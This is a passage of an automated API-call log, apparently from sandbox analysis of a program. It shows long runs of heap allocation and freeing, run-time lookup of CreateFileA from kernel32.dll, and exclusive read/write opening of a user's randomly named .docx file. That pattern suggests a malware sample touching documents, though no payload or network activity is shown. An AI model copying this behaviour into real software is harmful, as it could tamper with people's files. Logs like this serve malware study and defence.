RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.342] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd4c8 [0177.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd4c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0177.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.342] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0177.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.342] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0177.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd4c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0177.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.343] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0177.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0177.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0177.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x42) returned 0x9aa4f8 [0177.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx", cchWideChar=66, lpMultiByteStr=0x9aa4f8, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx", lpUsedDefaultChar=0x0) returned 66 [0177.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0177.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0177.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.345] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\8kaz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=66, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x84) returned 0x8feba8 [0177.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=66, lpWideCharStr=0x8feba8, cchWideChar=66 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx") returned 66 [0177.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.346] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0177.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.348] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0177.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0177.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 